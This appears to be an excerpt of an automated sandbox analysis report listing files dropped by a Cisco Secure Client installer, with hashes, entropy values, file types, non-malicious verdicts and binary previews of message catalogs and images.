                                                                                                                                                                                                  SHA-512:40BB0959EDBD50068288328C8FA268F856BFB70A3737E84E129AE9A1400BF182975D2AD0BEBD5E271A30F7A893BA15CE472A9A80869D58378402CC2D822F97E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):312691
                                                                                                                                                                                                  Entropy (8bit):6.238069670792444
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK5pl6VBKfKh+spMr61W19INBYB4XGt48xITy:L7h3upMrT19INBYB4XGt48x+y
                                                                                                                                                                                                  MD5:05212F97A23F922493CD7F066373D92C
                                                                                                                                                                                                  SHA1:F8C2E7CD2949950A1227F02058B82E81876F5C73
                                                                                                                                                                                                  SHA-256:66997C101367684439899AC5A287CF194AC7E0BA9CBA753BC620D15B8F98193E
                                                                                                                                                                                                  SHA-512:40BB0959EDBD50068288328C8FA268F856BFB70A3737E84E129AE9A1400BF182975D2AD0BEBD5E271A30F7A893BA15CE472A9A80869D58378402CC2D822F97E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):312693
                                                                                                                                                                                                  Entropy (8bit):6.237794032422467
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK4rOZVBKfKh+VpMr61W19INBYB4XGt48xITy:L7h4ppMrT19INBYB4XGt48x+y
                                                                                                                                                                                                  MD5:15A97AEAB455C7659F975BF82E1FD0AA
                                                                                                                                                                                                  SHA1:811FE4D65EDD072EB5FE66FBBFC49EA7E74A2D33
                                                                                                                                                                                                  SHA-256:C71C31ED87B28224850C804EBFA8CBF2B7FAF3AA9AAD453269BCE3BEBC288243
                                                                                                                                                                                                  SHA-512:61A3C8E99A1D7F37AE9DF2FA1BE97BDBB4A83A2A676BF1C1E5C7169CFEC44AF13975E4140CA0118586DDBE774C3F1269691D7C4C7BB41A9557A55836BD568A6F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):312693
                                                                                                                                                                                                  Entropy (8bit):6.237794032422467
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK4rOZVBKfKh+VpMr61W19INBYB4XGt48xITy:L7h4ppMrT19INBYB4XGt48x+y
                                                                                                                                                                                                  MD5:15A97AEAB455C7659F975BF82E1FD0AA
                                                                                                                                                                                                  SHA1:811FE4D65EDD072EB5FE66FBBFC49EA7E74A2D33
                                                                                                                                                                                                  SHA-256:C71C31ED87B28224850C804EBFA8CBF2B7FAF3AA9AAD453269BCE3BEBC288243
                                                                                                                                                                                                  SHA-512:61A3C8E99A1D7F37AE9DF2FA1BE97BDBB4A83A2A676BF1C1E5C7169CFEC44AF13975E4140CA0118586DDBE774C3F1269691D7C4C7BB41A9557A55836BD568A6F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313019
                                                                                                                                                                                                  Entropy (8bit):6.234654802477353
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                                                                                  MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                                                                                  SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                                                                                  SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                                                                                  SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313019
                                                                                                                                                                                                  Entropy (8bit):6.234654802477353
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                                                                                  MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                                                                                  SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                                                                                  SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                                                                                  SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313017
                                                                                                                                                                                                  Entropy (8bit):6.23496399047262
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                                                                                  MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                                                                                  SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                                                                                  SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                                                                                  SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313017
                                                                                                                                                                                                  Entropy (8bit):6.23496399047262
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                                                                                  MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                                                                                  SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                                                                                  SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                                                                                  SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3882
                                                                                                                                                                                                  Entropy (8bit):6.743390042757195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                                                                                  MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                                                                                  SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                                                                                  SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                                                                                  SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3884
                                                                                                                                                                                                  Entropy (8bit):6.749338244156901
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgJLkXf:iXHt+JcNgOSiS4XsAYNpf2ESNtg1kXf
                                                                                                                                                                                                  MD5:ECBD0E4A17836F184F084BF3D9170141
                                                                                                                                                                                                  SHA1:45E135215179398684C1D52BB8430D827577500D
                                                                                                                                                                                                  SHA-256:5734B02A7A809DC54D75C00E7137CE9F2BF85CE8050B6105016FEE5D5E1BA44B
                                                                                                                                                                                                  SHA-512:5EB8B7519E6F9EE518812B3F0D8DF3C3E6A73A899E70F853848C69551B783663111B62900837CF0F02098A7452EE3D8638839658B3724990BFA5C2BF148B8D05
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3880
                                                                                                                                                                                                  Entropy (8bit):6.742220289284142
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcr:iXHt+JcNgOSiS4XsAYNpf2ESNVr
                                                                                                                                                                                                  MD5:3C512CF63246231506E533D6800FF3EB
                                                                                                                                                                                                  SHA1:CF02F3D7AD80DC48B900464D1F8D828F44213443
                                                                                                                                                                                                  SHA-256:C211B550E4DF39BDD1E7A39E7979EBFEAB155BDAEF2498A09D63B45713C30768
                                                                                                                                                                                                  SHA-512:ECE459102971594D5EB348FF9AA16E5EC0E7222594D63096289B566B07D020B534947D231E6C3CA1E139F407B9A5251933CF38C7BCEDAE693741499A9108D9D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3881
                                                                                                                                                                                                  Entropy (8bit):6.749191813135782
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgI+P:iXHt+JcNgOSiS4XsAYNpf2ESNtgB
                                                                                                                                                                                                  MD5:C09256A999756AFFAE49A6E4346D910C
                                                                                                                                                                                                  SHA1:95158F9717019700B626D2A675F17C50853E436E
                                                                                                                                                                                                  SHA-256:D2913B404D604DD9F61952E0539DA5FCD742FC7E87F30CCC4263303DEC5F43B0
                                                                                                                                                                                                  SHA-512:D2DD40D4A8FBFEC4DFB2EF285880F103CB50D0AB461731915C15D8A4061E77C70513658419FF72925D90741FBD75079899E5293A107B7361B2142358534C94EA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):431993
                                                                                                                                                                                                  Entropy (8bit):4.565786626694248
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                                                                                  MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                                                                                  SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                                                                                  SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                                                                                  SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:............ ............... ............... .^N............ .(R............ .(...!S..``.... .....I[..@@.... .(B......00.... ..%...2..((.... .h....W.. .... .....)r........ .............. .....Y......... .h........PNG........IHDR.....................pHYs..........o.d.. .IDATx...wtUU....MO..B....TA.. ...l....Ti"H.E...D@lT.EA.).... ........R...{o...Jd..o.L...},.RJ9.1.......#W..` (.#.._.....?>|..ki@j.G..........q..........2>....( ......RJ)u.,..J).2..a@^ <....C..?;..}9..f..p....|..#,.J...Rn.]..(.T.3.x....@..|.D..vu.N....W.|D.....y..(..5.c, ..^..!}.....Np...eY)B.R...PJy<cL(P9."._.............^...W....RJ)G..@).1.1.@9...U2>*..UGy.(2......,..M..R6..@).1..r._....dH.S.WC.Ws.eYi...R*+h...ri..?.j.........[..vsyc.eY...R..i...r).....wd|.B..+.....M.F`.eY.e#)....@).h.R..._..=...K9.q....>v..".....Q..cdl.....w.~Q.R.$.......t.R.I..PJ...<.C.}..&....M...h..(.l.1.....J..!...2>.Y.uA8.R...^.T.2...........H).I...V..,..!.G)...PJe..}....S.....r9'.....e....r3..(.n.1.8......M
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1807
                                                                                                                                                                                                  Entropy (8bit):7.846793911413473
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                                                                                  MD5:536C911881523B9F8402A481881992A0
                                                                                                                                                                                                  SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                                                                                  SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                                                                                  SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..;R#I..k.........1...h.@'..:.V...1'.q..kM...Ly..h..6J.=....Y.%E~...!..wVe... .. .. .. ....O;....I..UO...........R.........7...E)5W.d...Q.)J5.7\{....Q.W.P.R.a.@.*K......ab...Q.d..zV....^..m.C.t..U.Y.e..(.....x.J)...s.....)..XM....Y.._~Q......o#..........=.p+b.E..X..X.}.'..o...DJw..GJq.].^.%R.#..3.y<.s...5.......s.s....;>.Z.q.F./..r.Z...T..=.&H......z...~J/.%.....(.~.|R7...z.LV....+.........T....|L.1i<..Zc.]LO.;.@.:.?IU./..A.,.-.rGr!Z...'I.........6+^......a....n6~e6ejy.f.........\UC..\..i..s.r.U_.i..>......u...p...zb5..t|u.h.*gxD..}6T[i.jxO./..goc...9......(.[..........*.{.8.f.(..R..J8.za.;.t..aj./.5.^px....g[...]z...=.Q.Q.%.D...z2`.;.6.K9.26Tc'....)_...$..<.&.7v.....pQ..N....s.c...XX..x.>..O.....)&/IYm..=....7.A.......c$..R....T{.q......C..@.L.....]({..>y.:.e.#....ym.....g^.R.....v.$.M.B.E....^.xSF80......n|Ph./..%<.I...X.f..=.pz..~...a..O1.9g.m.Mp....n.v%D....w....F6.....{.".!.~.}..}.P.S.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):388
                                                                                                                                                                                                  Entropy (8bit):7.139959170245274
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7Hel//IgFAkq3Dhp5tRX3Sq+IeSzgKOg6p2e:aehvFXSELAgKja2e
                                                                                                                                                                                                  MD5:34C2847A763607A881B1E9A81CA9A4DC
                                                                                                                                                                                                  SHA1:B6050C2A1AA45C78F273B76FB729158E0F172D18
                                                                                                                                                                                                  SHA-256:4D735FCC94C53B0753F49E2656EE480D37F4899520F17C48FF7D1F0DDC2A9A8C
                                                                                                                                                                                                  SHA-512:8E3C4C1F62BDF79B2C5263D0C4DD97E302261A0C5C9399C13FADD3E25301F7DDA7297ECE3A8352534C9DA4B3A23FFE497FD61BDA348D14BB6658AF2C66863727
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~....6IDATH...M.0.E.L....&hG..t...f.........F`.l..}n.....B..).....}.p.k....x..3n|oI.^..G._~%..3...7~.^...#D..]/.lD.....{...#..:...k..+n.U.....)".]'g...9Y...G.w^v.&.FX{....".i.k.:..bN.......b.(H......8.y. .E...s$.V.....U.sOwFo.#...a;:....2.....=.....P...ct.k.A..-....Q...<..R...$.FX.-M......k.W...b.}2o.....p.........IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
